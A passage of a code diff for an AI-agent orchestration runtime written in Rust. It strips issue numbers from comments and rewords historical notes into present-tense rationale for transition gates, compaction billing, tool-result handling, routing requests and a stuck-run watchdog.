@@ -9021,7 +9023,7 @@ fn enforce_max_iterations_below_limit_or_unlimited_or_paused_is_noop() {
     }
 }
 
-// ── stuck detection (#106) ──────────────────────────────────────────────
+// ── stuck detection ─────────────────────────────────────────────────────
 
 fn stuck_cfg(
     iterations: Option<usize>,
@@ -9731,7 +9733,7 @@ fn resolve_transition_resumes_the_stage_when_the_stuck_edge_is_gone() {
     assert!(world.get::<StageOutcome>(e).is_none());
 }
 
-// ── required-region gating (#5) ──
+// ── required-region gating ───────
 
 fn required_bp(tools: &[&str], custom_msg: Option<&str>) -> AgentBlueprint {
     let region =
@@ -9948,7 +9950,7 @@ fn require_context_regions_proceeds_when_met_capped_or_errored() {
     }
 }
 
-// ── transition gates: require_region_updated (#343) ──
+// ── transition gates: require_region_updated ─────────
 
 /// A gate that watches a region for change rather than for content.
 fn change_gate(region: &str) -> leviath_core::blueprint::TransitionGate {
@@ -10101,7 +10103,7 @@ fn only_watched_regions_get_a_baseline() {
     assert!(crate::pipeline::transition::watched_region_digests(&missing, &w).is_empty());
 }
 
-// ── the runaway-context warning (#347) ──
+// ── the runaway-context warning ─────────
 
 fn ledger_record() -> leviath_core::run_meta::StageRecord {
     leviath_core::run_meta::StageRecord::new("profile".to_string(), 0)
@@ -10153,7 +10155,7 @@ fn a_zero_baseline_cannot_run_away() {
     assert!(!rec.runaway_warned);
 }
 
-// ── transition gates: require_no_open_items (#342) ──
+// ── transition gates: require_no_open_items ─────────
 
 /// A window whose checklist holds `open` open items and `done` closed ones.
 fn checklist_window(open: usize, done: usize) -> ContextWindow {
@@ -10376,7 +10378,7 @@ fn the_checklist_path_holds_together() {
     assert!(region.render_checklist().contains("0 open, 3 done"));
 }
 
-// ── transition gates: require_modifications (#107) ──
+// ── transition gates: require_modifications ─────────
 
 fn gate(region: Option<&str>, message: Option<&str>) -> leviath_core::blueprint::TransitionGate {
     leviath_core::blueprint::TransitionGate {
@@ -10675,7 +10677,7 @@ fn resolve_transition_skips_the_gate_on_an_error_edge() {
     assert_eq!(world.get::<StageProgress>(e).unwrap().gate_reentries, 0);
 }
 
-// ── file tracking (#6) ──
+// ── file tracking ───────
 
 fn ftc(
     reads: bool,
@@ -10867,7 +10869,7 @@ fn collect_tools_applies_file_tracking_from_blueprint() {
     );
 }
 
-// ── modification accounting (#107) ──
+// ── modification accounting ─────────
 
 /// Drive `collect_tools` over one batch of `(tool, result)` pairs against a
 /// stage whose outgoing edge names `extra_tools` as modifying, returning the
@@ -10956,8 +10958,8 @@ fn collect_tools_counts_successful_writes_and_their_paths() {
 fn collect_tools_separates_failed_denied_and_non_modifying_calls() {
     let (progress, flags) = count_modifications(
         &[
-            // Read-only work through the shell is exactly what #107 is about:
-            // it must not read as a modification.
+            // Read-only work through the shell must not read as a
+            // modification.
             ("shell", serde_json::json!({"command": "cat a.rs"}), "…"),
             (
                 "write_file",
@@ -11127,7 +11129,7 @@ fn stage_modifying_tools_defaults_without_a_blueprint_or_stage() {
     );
 }
 
-// ── workspace health (#107) ──
+// ── workspace health ─────────
 
 fn run_workspace_check(world: &mut World) {
     let mut s = Schedule::default();
@@ -11221,7 +11223,7 @@ fn workspace_check_is_a_no_op_when_healthy_off_interval_or_inactive() {
     }
 }
 
-// ── repetition detection (#8) ──
+// ── repetition detection ───────
 
 #[test]
 fn collect_tools_injects_repetition_nudge_when_looping() {
@@ -11266,7 +11268,7 @@ fn collect_tools_injects_repetition_nudge_when_looping() {
     );
 }
 
-// ── requires_children gate (#7) ──
+// ── requires_children gate ───────
 
 use crate::components::SubAgentChildren;
 
@@ -11452,9 +11454,9 @@ fn collect_compaction_stores_summary_and_clears_source() {
 }
 
 /// A summary with nothing in it is a compaction that failed, not one that found
-/// nothing worth keeping. Storing it traded the region's real contents for a
-/// blank, and the blank later reached a provider as a zero-length turn - which
-/// is a 400 no retry clears (issue #495).
+/// nothing worth keeping. Storing it trades the region's real contents for a
+/// blank, and the blank later reaches a provider as a zero-length turn - which
+/// is a 400 no retry clears.
 #[test]
 fn collect_compaction_keeps_the_region_when_the_summary_is_empty() {
     for summary in ["", "   \n\t "] {
@@ -11545,9 +11547,9 @@ fn compaction_calls_are_counted_one_record_per_region() {
 /// And it lands on the stage that paid for it, not only on the run.
 ///
 /// A summarize call sees a whole region, so a stage that compacts twice can
-/// spend more on summarizing its context than on the work - and the stage
-/// ledger, which exists to answer "which stage cost me that", counted only the
-/// stage's own turns. It answered for the cheap half of the bill (#630).
+/// spend more on summarizing its context than on the work. A stage ledger that
+/// counted only the stage's own turns would answer "which stage cost me that"
+/// for the cheap half of the bill.
 #[test]
 fn a_compaction_call_is_billed_to_the_stage_that_needed_it() {
     let (mut world, tx) = world_with_compaction_results();
@@ -11864,10 +11866,10 @@ async fn reflect_flips_active_to_waiting_and_back_when_prompt_clears() {
 }
 
 /// Time spent waiting on a person is not time the agent spent stuck. An
-/// implement stage with `stuck_after_minutes = 15` whose operator took an hour
-/// to answer a write approval used to trip its stuck edge on the very next tick
-/// after the answer, because the stage clock kept running through the wait.
-/// The wait is now credited back to the clock when the prompt resolves.
+/// implement stage with `stuck_after_minutes = 15` whose operator takes an
+/// hour to answer a write approval would trip its stuck edge on the very next
+/// tick if the stage clock kept running through the wait, so the wait is
+/// credited back to the clock when the prompt resolves.
 #[tokio::test]
 async fn reflect_keeps_a_wait_on_a_person_off_the_stage_clock() {
     let hub = InteractionHub::new();
@@ -12123,7 +12125,7 @@ fn persistence_rewrites_when_status_changes() {
 /// `last_progress_at` is what `lev ps` ages its rows against, so it must move
 /// only when the agent does. `updated_at` cannot serve: the heartbeat advances
 /// it on a run that is doing nothing at all, which is exactly how a wedged run
-/// gets mistaken for a busy one (issue #184).
+/// gets mistaken for a busy one.
 #[test]
 fn last_progress_at_tracks_progress_and_not_the_heartbeat() {
     let (mut world, mut rx) = world_with_persistence();
@@ -12543,10 +12545,10 @@ fn run_collect_transition(world: &mut World) {
 /// question, and the move to the next stage cuts the visit rather than
 /// backdating the answer into it.
 ///
-/// One routing call fires at every boundary of every branching run, and the
-/// stage ledger counted none of them. Attributing it to the stage being entered
-/// would be worse than leaving it out: the run had not started that stage's work
-/// when it paid for the question (#630).
+/// One routing call fires at every boundary of every branching run, so a stage
+/// ledger that skips them is missing real money. Attributing it to the stage
+/// being entered would be worse than leaving it out: the run has not started
+/// that stage's work when it pays for the question.
 #[test]
 fn a_routing_call_is_billed_to_the_stage_it_leaves_and_cuts_the_visit() {
     let (mut world, tx) = world_with_transition_results();
@@ -12680,10 +12682,10 @@ fn collect_choice_holds_an_outcome_that_lands_on_a_paused_agent() {
 /// A network that is down at a stage boundary parks the run, exactly as it does
 /// one call earlier on the stage's own inference.
 ///
-/// These two lanes used to disagree. The same failure, a second apart, either
-/// paused the run for a `lev resume` or killed it and threw away every stage it
-/// had finished - decided by nothing more than which call happened to be in
-/// flight when the network went.
+/// The two lanes must not disagree. Let them and the same failure, a second
+/// apart, either pauses the run for a `lev resume` or kills it and throws away
+/// every stage it had finished - decided by nothing more than which call
+/// happened to be in flight when the network went.
 #[test]
 fn collect_choice_parks_a_run_the_provider_could_not_be_reached_for() {
     let (mut world, tx) = world_with_transition_results();
@@ -13513,10 +13515,9 @@ fn stage_setup_from_folds_a_required_output_into_the_system_prompt() {
     assert!(prompt.contains("{\"root\": {}}"), "{prompt}");
 }
 
-/// Issue #282. The stage's own prompt and the resolved spec are both just text
-/// to a model, so the spec has to come last *and* say it governs. Ordering on
-/// its own is what the reported build already did, and a strong stage prompt
-/// still won on some models.
+/// The stage's own prompt and the resolved spec are both just text to a model,
+/// so the spec has to come last *and* say it governs. Ordering on its own is
+/// not enough: a strong stage prompt still wins on some models.
 #[test]
 fn a_required_outputs_shape_comes_after_the_stage_prompt_and_outranks_it() {
     let spec = leviath_core::output::OutputSpec {
@@ -14179,7 +14180,7 @@ fn entering_a_stage_clears_the_output_reentry_count() {
     assert!(world.get::<OutputReentries>(e).is_none());
 }
 
-// ─── on_stage_enter (issue #260) ─────────────────────────────────────────────
+// ─── on_stage_enter ──────────────────────────────────────────────────────────
 
 fn hook_scripts(src: &str, wanted: &[&str]) -> crate::components::StageHookScripts {
     let compiled = leviath_scripting::stage_hook::compile("h.rhai", src, wanted)
@@ -14540,7 +14541,7 @@ fn a_refusal_without_a_reason_still_says_it_was_refused() {
     assert!(message.contains("no reason given"), "{message}");
 }
 
-// ─── before_inference / after_inference (issue #260) ─────────────────────────
+// ─── before_inference / after_inference ──────────────────────────────────────
 
 fn stage_hooked(
     field: impl FnOnce(&mut leviath_core::blueprint::StageHooks, String),
@@ -14962,7 +14963,7 @@ fn an_inference_hook_refusing_without_a_reason_still_says_what_it_refused() {
     assert!(msg.contains("no reason given"), "{msg}");
 }
 
-// ─── on_tool_call (issue #260) ───────────────────────────────────────────────
+// ─── on_tool_call ────────────────────────────────────────────────────────────
 
 fn call(name: &str, args: serde_json::Value) -> crate::components::ToolCall {
     crate::components::ToolCall {
@@ -15308,7 +15309,7 @@ fn on_tool_call_skips_an_out_of_range_stage_and_a_stage_that_declared_none() {
     assert!(status_message(&world, undeclared).is_none());
 }
 
-// ─── on_completion / on_error (issue #260) ───────────────────────────────────
+// ─── on_completion / on_error ────────────────────────────────────────────────
 
 fn run_terminal(world: &mut World) {
     let mut schedule = Schedule::default();
@@ -15620,7 +15621,7 @@ fn on_completion_rewriting_a_missing_answer_is_refused() {
     );
 }
 
-// ─── on_stage_exit (issue #260) ──────────────────────────────────────────────
+// ─── on_stage_exit ───────────────────────────────────────────────────────────
 
 fn spawn_exiting(world: &mut World, src: &str) -> Entity {
     world
@@ -15770,7 +15771,7 @@ fn on_stage_exit_skips_an_out_of_range_stage_and_a_stage_that_declared_none() {
     assert!(status_message(&world, undeclared).is_none());
 }
 
-// ─── Stage instructions get a region of their own (#366) ─────────────────────
+// ─── Stage instructions get a region of their own ────────────────────────────
 
 /// Build a window whose pinned regions are `names`, in that order.
 fn instructions_window(names: &[&str]) -> ContextWindow {
@@ -15808,9 +15809,9 @@ fn stage_instructions_still_land_in_the_first_pinned_region_by_default() {
     );
 }
 
-/// Declared, it goes there instead - so its tokens stop being charged to
-/// whichever region an author happened to declare first, which is what made the
-/// per-region numbers in the stage ledger untrustworthy.
+/// Declared, it goes there instead - so its tokens are not charged to whichever
+/// region an author happened to declare first, which would make the per-region
+/// numbers in the stage ledger untrustworthy.
 #[test]
 fn a_declared_stage_instructions_region_receives_the_prompt() {
     let mut window = instructions_window(&["task", "stage_instructions"]);
@@ -15840,7 +15841,8 @@ fn a_declared_stage_instructions_region_receives_the_prompt() {
 /// everything behind it on every transition.
 #[test]
 fn stage_instructions_render_after_every_other_pinned_block() {
-    // Declared *first*, which is the arrangement that used to poison the prefix.
+    // Declared *first*, the arrangement that poisons the prefix if declaration
+    // order decides render order.
     let mut window = instructions_window(&["stage_instructions", "task", "notes"]);
     window
         .add_to_region("task", "the task".to_string(), 2)
@@ -15963,7 +15965,7 @@ fn stage_instructions_survive_a_stage_layout_that_does_not_declare_them() {
     );
 }
 
-// ─── The pointer tells the truth about a region the stage cannot see (#370) ──
+// ─── The pointer tells the truth about a region the stage cannot see ─────────
 
 /// Build a window with `regions` plus `conversation`, hiding `hidden`.
 fn routed_window(regions: &[&str], hidden: &[&str]) -> ContextWindow {
@@ -16009,11 +16011,11 @@ fn one_read_call() -> (Vec<crate::components::ToolCall>, Vec<(String, String)>) 
 /// The pointer that reaches the model when the region *is* visible: it is
 /// already in the prompt, so say where, and do not ask for a tool call.
 ///
-/// This used to read "read that region for the full result", which is an
-/// instruction with nothing behind it - the region renders into the system
-/// prompt, and the stages that route mostly do not grant `context_read`. What
-/// models did instead was aim `read_file` at the region name, and across 152
-/// local runs that was 90 of 168 failed `read_file` calls.
+/// "Read that region for the full result" would be an instruction with nothing
+/// behind it - the region renders into the system prompt, and the stages that
+/// route mostly do not grant `context_read`. Models aim `read_file` at the
+/// region name instead: across 152 local runs that was 90 of 168 failed
+/// `read_file` calls.
 #[test]
 fn a_pointer_to_a_visible_region_says_it_is_already_in_the_prompt() {
     let mut window = routed_window(&["data_preview"], &[]);
@@ -16341,7 +16343,7 @@ fn a_pointer_to_a_hidden_region_says_it_cannot_be_read_here() {
     );
 }
 
-// ─── A gate that can actually require a region (#371) ────────────────────────
+// ─── A gate that can actually require a region ───────────────────────────────
 
 /// A gate that asks only for regions, so these tests isolate the new condition
 /// from `require_modifications`. The two together are covered separately.
@@ -16371,10 +16373,9 @@ fn gate_window(regions: &[&str], filled: &[&str]) -> ContextWindow {
     window
 }
 
-/// The heart of #371: `require_modifications` with `region` is satisfied by any
-/// write anywhere, so the named region can still be empty. `require_regions` is
-/// the conjunction that was missing - it holds whatever else the gate is happy
-/// about.
+/// `require_modifications` with `region` is satisfied by any write anywhere, so
+/// the named region can still be empty. `require_regions` is the conjunction
+/// that closes that: it holds whatever else the gate is happy about.
 #[test]
 fn require_regions_blocks_even_when_the_stage_wrote_files() {
     let stage = writing_stage("plan", Vec::new());
@@ -16524,9 +16525,9 @@ fn require_regions_and_require_modifications_must_both_hold() {
 
 /// Giving up on a required region is recorded, not just logged.
 ///
-/// A log line cannot be read after the fact, so a run whose agent wrote its
-/// plan and one where we asked twice and moved on both finished `complete` and
-/// nothing downstream could tell them apart (#371).
+/// A log line cannot be read after the fact, so without the record a run whose
+/// agent wrote its plan and one where the runtime asked twice and moved on both
+/// finish `complete` with nothing downstream able to tell them apart.
 #[test]
 fn abandoning_a_required_region_is_recorded_in_the_run() {
     let mut world = World::new();
@@ -16644,7 +16645,7 @@ fn a_region_abandoned_twice_is_listed_once() {
     );
 }
 
-// ─── A deliverable region survives a bare compact (#369) ─────────────────────
+// ─── A deliverable region survives a bare compact ────────────────────────────
 
 /// A window with a transcript and a results region, both non-pinned.
 fn compact_window(results_summarizable: bool) -> ContextWindow {
@@ -17201,9 +17202,9 @@ fn cut_off_arguments_refusal_quotes_the_tail() {
     );
 }
 
-/// An accepted text-only reply stays in the conversation. It used to vanish,
-/// so a gate that bounced the stage back was talking to a model with no
-/// memory of its own draft.
+/// An accepted text-only reply stays in the conversation. Drop it and a gate
+/// that bounces the stage back is talking to a model with no memory of its own
+/// draft.
 #[test]
 fn empty_response_keeps_the_reply_it_accepts() {
     let mut world = World::new();
@@ -17388,7 +17389,7 @@ fn routing_request_shares_the_stage_prefix_and_forbids_tool_use() {
         serde_json::json!({ "tool_choice": { "type": "none" } })
     );
 
-    // A provider this cannot vouch for gets the old shape: no tools at all.
+    // A provider this cannot vouch for gets no tools at all.
     si.provider_name = "cfg".to_string();
     let routing = routing_request(&w, None, &si, &p, "analyze", 3, PriorCalls::default());
     assert!(routing.tools.is_empty());

--- a/crates/leviath-runtime/src/pipeline/tool_results.rs
+++ b/crates/leviath-runtime/src/pipeline/tool_results.rs
@@ -234,8 +234,8 @@ pub(crate) fn apply_one_tool_result(
     // back to a truncated (then omitted) entry if the region is full.
     //
     // Reports which of the three happened, because the pointer left in the
-    // conversation describes this write and used to describe it wrongly:
-    // it promised the full result whatever the region had actually kept.
+    // conversation describes this write: it must not promise the full result
+    // when the region kept less than that.
     let add_kind = |window: &mut ContextWindow,
                     region: &str,
                     kind: leviath_core::EntryKind,
@@ -319,19 +319,19 @@ pub(crate) fn apply_one_tool_result(
         );
         // What this text asks the model to do is the whole point of it.
         //
-        // It used to say "read that region for the full result", which is
-        // an instruction with no tool behind it: the region is rendered
-        // into the system prompt already, and `context_read` is not granted
-        // by most stages that route. Models did the only thing left and
-        // pointed `read_file` at the region name - across 152 local runs,
-        // 90 of 168 failed `read_file` calls were a region name where a path
-        // belongs, one run spending five turns on five spellings of
-        // `raw_findings`. So the pointer now names the `## region` heading
-        // the assembler emits and says no call is needed.
+        // "Read that region for the full result" is an instruction with no
+        // tool behind it: the region is rendered into the system prompt
+        // already, and `context_read` is not granted by most stages that
+        // route. Models do the only thing left and point `read_file` at the
+        // region name - across 152 local runs, 90 of 168 failed `read_file`
+        // calls were a region name where a path belongs, one run spending
+        // five turns on five spellings of `raw_findings`. So the pointer
+        // names the `## region` heading the assembler emits and says no call
+        // is needed.
         //
         // A region this stage does not render is the other half: the model
         // cannot go and read it, so telling it to is worse than saying
-        // nothing (#370). `lev validate` refuses a blueprint that routes
+        // nothing. `lev validate` refuses a blueprint that routes
         // that way, so reaching here means a layout swapped underneath a
         // routing rule rather than an author mistake - but the model still
         // needs to be told the truth about where its output went.
@@ -654,7 +654,7 @@ pub(crate) fn collect_tools(
             parts.extend(ctx.0.iter().cloned());
         }
         let mut merged = merge_in_call_order(&infer.tool_calls, &parts);
-        // Modification accounting (issue #107): count the file-writing calls this
+        // Modification accounting: count the file-writing calls this
         // stage actually landed, so a `require_modifications` transition gate can
         // tell "analyzed the code and wrote nothing" from "made the change".
         // Done before file tracking, which rewrites successful results.

--- a/crates/leviath-runtime/src/pipeline/tools.rs
+++ b/crates/leviath-runtime/src/pipeline/tools.rs
@@ -23,7 +23,7 @@ pub struct DynamicTools;
 /// Reports one tool call's result the moment it resolves, from inside the
 /// executor - `(tool_call_id, result)`. Dispatch builds one per batch to journal
 /// each completion as a `ToolCallDone` record, so a crash mid-batch loses only
-/// the calls that genuinely never finished (issue #96). Implementors that don't
+/// the calls that genuinely never finished. Implementors that don't
 /// journal get a no-op.
 pub type ToolProgress = Arc<dyn Fn(&str, &str) + Send + Sync>;
 
@@ -149,10 +149,9 @@ pub(crate) fn merge_in_call_order(
 /// gate stopped it) all mean the same thing to anything reasoning about what
 /// the agent *did*: file tracking must not record a write that was not
 /// written, and the modification counters behind a transition gate must not
-/// count it as work. Separate prefix lists are exactly how a new prefix gets
-/// missed - `[unavailable]` was, when dispatch began refusing unoffered tools
-/// and both call sites still listed only two, and `[blocked]` was again, so a
-/// taint-blocked write counted as a modification until issue #155's pass.
+/// count it as work. One predicate, one list: keep the prefixes in two places
+/// and adding a fourth means a call site still testing three, which files a
+/// blocked write as a modification.
 pub(crate) fn call_had_no_effect(result: &str) -> bool {
     result.starts_with("[error]")
         || result.starts_with("[denied]")
@@ -353,7 +352,7 @@ pub(crate) struct DaemonServices<'w> {
 /// (inline results pre-filled, lane calls pending) goes to the persistence lane
 /// with an ack the exec waits on, and a per-call [`ToolProgress`] journals each
 /// completion as a `ToolCallDone`. On a crash mid-batch, recovery replays the
-/// recorded results instead of re-running their side effects (issue #96).
+/// recorded results instead of re-running their side effects.
 pub(crate) fn dispatch_tools(
     mut agents: Query<DispatchToolsQuery, With<ReadyForTools>>,
     service: Res<ToolServiceRes>,
@@ -591,9 +590,9 @@ pub(crate) fn dispatch_tools(
             // After the gate, not before it with the other inline tools: the
             // submitted answer leaves the machine (`GET /api/agents/{id}/result`,
             // the dashboard), so `submit_output` is classified outbound, and a
-            // classification the gate never sees gates nothing. It used to be
-            // applied above the gate, which is what let a Private region reach a
-            // remote reader with no prompt however it was classified.
+            // classification the gate never sees gates nothing. Applied above
+            // the gate, a Private region reaches a remote reader with no
+            // prompt however it was classified.
             if crate::output_tool::is_output_tool(&c.name) {
                 let stage_names: Vec<String> = blueprint
                     .map(|bp| bp.0.stages.iter().map(|s| s.name.clone()).collect())
@@ -726,15 +725,14 @@ pub(crate) fn dispatch_tools(
             // Nothing async to run - apply the context results now and loop back.
             let merged = merge_in_call_order(&result.tool_calls, &context_results);
             // Log the calls here, because this batch never reaches
-            // `collect_tools` - the usual writer of `[tool]` lines - and so
-            // left no trace anywhere a person can read. A batch of only
-            // inline-resolved calls (context tools, a refusal, a gate denial)
-            // still counts towards `meta.tool_calls`, so a run could report
-            // tool calls next to a stage log that recorded none of them, which
-            // is exactly how an empty activity panel came to look like a
-            // dropped-log bug (issues #589, #595). A mixed batch is already
-            // covered: `collect_tools` zips over every call, inline ones
-            // included.
+            // `collect_tools` - the usual writer of `[tool]` lines - and would
+            // otherwise leave no trace anywhere a person can read. A batch of
+            // only inline-resolved calls (context tools, a refusal, a gate
+            // denial) still counts towards `meta.tool_calls`, so without this
+            // a run reports tool calls next to a stage log that recorded none
+            // of them, and an empty activity panel reads as a dropped-log bug.
+            // A mixed batch is already covered: `collect_tools` zips over
+            // every call, inline ones included.
             if let Some(buffer) = io_buffer.as_deref_mut() {
                 let idx = cursor.map_or(0, |c| c.index);
                 for (call, (_id, tool_result)) in result.tool_calls.iter().zip(merged.iter()) {

--- a/crates/leviath-runtime/src/pipeline/transition.rs
+++ b/crates/leviath-runtime/src/pipeline/transition.rs
@@ -262,13 +262,12 @@ pub(crate) fn hold_for_gate(
 /// [`resolve_transition`], which follows the stage's `error`-conditioned edge
 /// when one has revisits left.
 ///
-/// Writing the status on its own is what several call sites used to do, and it
-/// silently discards the recovery the author declared. A `deep-researcher` run
-/// died that way with an `error_recovery` stage sitting unused in its graph and
-/// three stages still pending: a fan-out split that would not parse set
-/// `AgentStatus::Error` directly, and nothing ever consulted the edge. The
-/// distinction is invisible at the call site - both spellings "fail the run" -
-/// so the fix is one helper rather than a rule to remember.
+/// Writing the status on its own silently discards the recovery the author
+/// declared: setting `AgentStatus::Error` directly ends the run with the
+/// stage's `error_recovery` target sitting unused in the graph and every stage
+/// behind it still pending, because nothing ever consults the edge. The
+/// distinction is invisible at the call site - both spellings read as "fail the
+/// run" - so it lives in one helper rather than in a rule to remember.
 ///
 /// Not for conditions that are terminal by nature (a cancel, a completed run).
 /// This is for "this stage could not go on", which is exactly what an
@@ -426,10 +425,10 @@ pub(crate) fn resolve_transition(
         // A dead end resolves like a stage error: down the `error` edge when one
         // has budget left (this is what finally makes `error_recovery` reachable
         // for exhaustion, not just for provider failures), and otherwise the run
-        // FAILS. It used to resolve as `Terminal`, so a wide-researcher whose
-        // deep_dive ran `compare` out of revisits reported `complete` from the
-        // middle of its graph with the output stage still pending and nothing
-        // produced - success indistinguishable from the run that worked.
+        // FAILS. Resolving it as `Terminal` instead would report `complete`
+        // from the middle of a graph, with the output stage still pending and
+        // nothing produced - success indistinguishable from the run that
+        // worked.
         let resolution = match resolution {
             StageResolution::DeadEnd => {
                 let message = format!(
@@ -738,7 +737,7 @@ pub(crate) fn emit_stage_transition(
 /// rewrites the head of the prefix and invalidates everything behind it. Last
 /// means the bytes in front stay identical across a transition.
 ///
-/// Otherwise the historical target: the first pinned region, or `conversation`
+/// Otherwise the fallback target: the first pinned region, or `conversation`
 /// when a layout declares no pinned region at all.
 ///
 /// [`STAGE_INSTRUCTIONS_REGION`]: leviath_core::layout::STAGE_INSTRUCTIONS_REGION
@@ -770,10 +769,10 @@ pub(crate) fn apply_stage_context(
 ) -> Result<(), String> {
     // The hidden set describes the stage being entered and nothing else. A
     // stage with a layout of its own gets exactly what that layout leaves
-    // out; a stage without one carries everything (it used to inherit the
-    // previous stage's hidden set, so a stage after a narrowed one lost
-    // regions it never asked to lose); and `hide` then removes what this
-    // stage's own instructions never read.
+    // out; a stage without one carries everything (inheriting the previous
+    // stage's hidden set would cost a stage following a narrowed one regions
+    // it never asked to lose); and `hide` then removes what this stage's own
+    // instructions never read.
     match &setup.context_layout {
         Some(layout) => crate::context_setup::apply_layout(window, layout),
         None => window.hidden.clear(),

--- a/crates/leviath-runtime/src/pipeline/transition_choice.rs
+++ b/crates/leviath-runtime/src/pipeline/transition_choice.rs
@@ -152,8 +152,8 @@ type TransitionChoiceQuery = (
 /// the stage request's prefix - every provider caches the tool definitions
 /// as part of it - and this is what stops the model from answering the
 /// "which stage next?" question with a tool call instead of a name. A
-/// provider this cannot vouch for gets the old request with no tools, which
-/// is a cold prefix but a safe one.
+/// provider this cannot vouch for gets a request with no tools at all,
+/// which is a cold prefix but a safe one.
 fn routing_tool_choice(provider: &str) -> Option<serde_json::Value> {
     match provider {
         "anthropic" => Some(serde_json::json!({ "type": "none" })),
@@ -165,10 +165,11 @@ fn routing_tool_choice(provider: &str) -> Option<serde_json::Value> {
 /// The routing request: the stage's own request, built by the same code, with
 /// a short answer budget, a fixed temperature, and tool use switched off.
 ///
-/// It used to be assembled separately - no hint blocks, no stage metadata,
-/// no tools - so its prompt differed from the stage's from the first byte
-/// and every routing call was a cold read of the whole context: on a
-/// 170,000-token window that was a full re-send to get one word back.
+/// Building it through the stage's own builder is what keeps the two
+/// prompts byte-identical up to the last block. Assemble it separately and
+/// they diverge at the first byte, so every routing call is a cold read of
+/// the whole context: on a 170,000-token window, a full re-send to get one
+/// word back.
 pub(crate) fn routing_request(
     window: &ContextWindow,
     config: Option<&crate::components::InferenceConfig>,
@@ -228,7 +229,7 @@ pub(crate) fn dispatch_transition_choice(
         }
         // Same bookkeeping as the inference lane: an agent parked here is
         // runnable with nothing outstanding, so a decline that never resolves
-        // wedges the run just as thoroughly (issue #190).
+        // wedges the run just as thoroughly.
         let Some(provider) = providers.0.get(&si.provider_name) else {
             commands
                 .entity(entity)
@@ -399,8 +400,8 @@ pub(crate) fn collect_transition_choice(
                 // An empty account or a network that is down is not this run's
                 // fault, and it was not a moment ago either - the same failure
                 // one call earlier, on the stage's own inference, parks the run
-                // for a resume. Landing it at a stage boundary used to kill the
-                // run instead, throwing away every completed stage over a blip
+                // for a resume. Landing it at a stage boundary parks it too:
+                // failing here throws away every completed stage over a blip
                 // that is usually gone in seconds.
                 let provider = &stage_infs.0[cursor.index].provider_name;
                 if let Some((blocker, message)) =

--- a/crates/leviath-runtime/src/pipeline/watchdog.rs
+++ b/crates/leviath-runtime/src/pipeline/watchdog.rs
@@ -117,7 +117,7 @@ pub(crate) fn enforce_max_iterations(
         let max = stage.max_iterations.unwrap_or(0);
         if max > 0 && progress.iterations >= max {
             // Record it on the run: a stage that ran out of iterations is one of
-            // the ways a run ends up with nothing to show (issue #107).
+            // the ways a run ends up with nothing to show.
             if let Some(mut flags) = flags {
                 flags.0.max_iterations_hit += 1;
             }

--- a/crates/leviath-runtime/src/pipeline/wedge.rs
+++ b/crates/leviath-runtime/src/pipeline/wedge.rs
@@ -11,16 +11,16 @@
 //! That is not hypothetical. `PipelineWorld` already logs "a pipeline system
 //! panicked outside any agent's scope; the daemon survived (an agent may be
 //! wedged - cancel it via `lev cancel <run-id>`)": the runtime knows it can
-//! strand a run and asks a person to clean up. Issue #202 is what happens when
-//! the "person" is an unattended harness. It counted the run as occupying a slot
-//! for ever, and its factory ran down to zero free slots over a few hours.
+//! strand a run and asks a person to clean up. When the "person" is an
+//! unattended harness nobody ever does: the run occupies a slot for ever, and a
+//! factory runs down to zero free slots over a few hours.
 //!
 //! ## Why this cannot produce a false positive
 //!
 //! The trigger is structural, not temporal. It is not "this run looks old" -
-//! that is the shape of the misdiagnosis in issues #184, #189, #190 and #197,
-//! where a fresh `updated_at`, a bare `waiting`, and a `pid` field each got read
-//! as evidence they were never able to give. It is "the pipeline's own
+//! that is the shape of every misdiagnosis in this area, where a fresh
+//! `updated_at`, a bare `waiting`, or a `pid` field gets read as evidence it
+//! was never able to give. It is "the pipeline's own
 //! invariants say this state cannot exist", and the timeout only absorbs the
 //! transient windows inside a tick.
 //!
@@ -36,15 +36,15 @@
 //!   fifteen-minute call is never a candidate.
 //! - A full inference pool leaves the agent `ReadyToInfer` with a
 //!   [`DispatchStall`](super::DispatchStall). That is backpressure working as
-//!   designed, and issue #190's watchdog already declines to fail it.
+//!   designed, and the stall watchdog already declines to fail it.
 //! - A tool batch holds `AwaitingTools` and is deliberately unbounded: it may
 //!   park off-lane on a tool approval, an `ask_user`, or a `wait_for_agent` that
 //!   ends only when some other run does. Any clock-based rule would have to
 //!   guess a bound here. This one does not have to.
 //! - A run blocked on a person holds an interaction marker and is left entirely
-//!   alone. That is issue #204's territory, and deliberately so: killing a run
-//!   somebody is about to answer is a worse failure than leaking a slot, and two
-//!   timeouts racing over one status is how #184 happened.
+//!   alone, and deliberately so: killing a run somebody is about to answer is a
+//!   worse failure than leaking a slot, and two timeouts racing over one status
+//!   is how a run's status ends up lying about what happened to it.
 //! - `Paused` is skipped before the clock is even read, and loses any record it
 //!   was carrying, so resuming never finds a run the watchdog had started
 //!   counting.

--- a/crates/leviath-runtime/src/pipeline/wedge/tests.rs
+++ b/crates/leviath-runtime/src/pipeline/wedge/tests.rs
@@ -289,9 +289,9 @@ fn a_finished_run_with_no_record_is_a_no_op() {
     assert!(world.get::<Wedged>(e).is_none());
 }
 
-/// Issue #204's territory, not this watchdog's. A run parked on a question
-/// somebody may still answer holds an interaction marker, and killing it is a
-/// worse failure than leaving the slot occupied.
+/// Not this watchdog's territory. A run parked on a question somebody may
+/// still answer holds an interaction marker, and killing it is a worse failure
+/// than leaving the slot occupied.
 #[test]
 fn a_run_blocked_on_a_person_is_left_to_issue_204() {
     let mut world = World::new();
@@ -363,8 +363,8 @@ fn a_zero_timeout_disables_the_watchdog() {
     assert_eq!(status_of(&world, e), AgentStatus::Active);
 }
 
-/// A world that never installed the resource gets the default, which is off. An
-/// embedded runtime therefore behaves exactly as it did before this existed.
+/// A world that never installed the resource gets the default, which is off,
+/// so an embedded runtime never has a run failed by this watchdog.
 ///
 /// Off by default is deliberate, not an oversight: this watchdog fails runs, and
 /// an upgrade that starts killing work nobody asked it to kill is worse than the

--- a/crates/leviath-runtime/src/provider_creds.rs
+++ b/crates/leviath-runtime/src/provider_creds.rs
@@ -85,11 +85,11 @@ impl EndpointSpec {
     ///
     /// An option that is there but does not read back is an error, not an
     /// absence. The runtime wrote these from the config, so a failure is a
-    /// bug, and reading past it used to change what the entry meant: a
-    /// `models` list that did not parse became "the config did not say",
-    /// which lets the endpoint route any id where the list would have
-    /// refused the rest, and a header with a bad position was a header the
-    /// server never saw. The error names the entry and the option.
+    /// bug, and reading past it changes what the entry means: a `models` list
+    /// that does not parse reads as "the config did not say", which lets the
+    /// endpoint route any id where the list would have refused the rest, and a
+    /// header with a bad position is a header the server never sees. The error
